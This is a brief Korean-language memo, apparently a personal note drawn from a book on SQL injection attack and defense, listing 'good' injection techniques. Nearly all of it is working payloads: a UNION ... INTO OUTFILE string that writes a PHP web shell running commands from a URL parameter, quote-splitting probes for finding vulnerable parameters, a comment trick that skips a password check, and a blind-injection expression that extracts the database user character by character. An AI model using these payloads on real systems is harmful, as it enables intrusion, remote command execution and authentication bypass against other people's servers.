SQL injection 중 괜찮은 방법들..

SQL injection 공격 과 방어의 원리 책들중...

UNION 구문과 INTO OUTFILE 을 이용하여 웹쉘 만들기

1 UNION SELECT "<?system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/cmd.php" --

취약점 테스트로 좋은 구문

php?category=bikes -> php?category=bi''kes ->php?category=bi'+'kes

패스워드 주석처리해 버리기(세미콜론이 먹힐때 )

select *from table where username='admin '/*'and passworkd='*/'';

AND 나 OR 절 안쓰고 블라인드 하기 

where id =12/ (case+when+(ascii(substring(select+system_user),1,1))+>+64)+then+1+else+0+end)  //OK or error